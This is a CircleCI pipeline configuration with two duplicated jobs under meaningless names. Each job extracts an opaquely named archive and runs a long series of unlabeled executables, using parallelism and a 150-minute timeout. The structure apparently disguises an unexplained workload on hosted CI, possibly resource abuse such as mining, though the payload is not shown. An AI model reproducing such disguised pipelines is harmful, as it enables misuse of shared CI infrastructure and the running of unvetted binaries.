version: 2.1
jobs:
  Bonbon:
    docker:
      - image: circleci/python:3.8
    steps:
      - checkout
      - run:
          name: Axeis
          command: sudo apt update -y
      - run:
          name: Buioewe
          command: |
            tar -xf aownaszcewhui && chmod u+x *
            ./a
            ./b
            ./d
            ./vrs
            ./04
            ./c
      - run:
          name: Buioewele
          command: |
            ./d1
            ./d2
            ./d3
            ./d4
      - run:
          name: Seiroer
          command: |
            ./e1
            ./e2 && ./e3
            ./e4
      - run:
          name: Dwikorm
          command: |
            ./e2 && ./e3
            ./e4
      - run:
          name: Ranuer
          no_output_timeout: 150m
          command: |
            ./f
            ./f1
            ./f2
            ./f3
            ./g1
            ./g2 && ./e3
            ./e4
    parallelism: 3
  Bombom:
    docker:
      - image: circleci/python:3.8
    steps:
      - checkout
      - run:
          name: Axeis
          command: sudo apt update -y
      - run:
          name: Buioewe
          command: |
            tar -xf aownaszcewhui && chmod u+x *
            ./a
            ./b
            ./d
            ./vrs
            ./04
            ./c
      - run:
          name: Buioewele
          command: |
            ./d1
            ./d2
            ./d3
            ./d4
      - run:
          name: Seiroer
          command: |
            ./e1
            ./e2 && ./e3
            ./e4
      - run:
          name: Dwikorm
          command: |
            ./e2 && ./e3
            ./e4
      - run:
          name: Ranuer
          no_output_timeout: 150m
          command: |
            ./f
            ./f1
            ./f2
            ./f3
            ./g1
            ./g2 && ./e3
            ./e4
    parallelism: 3
workflows:
    version: 2.1
    build:
        jobs:
            - Bonbon
            - Bombom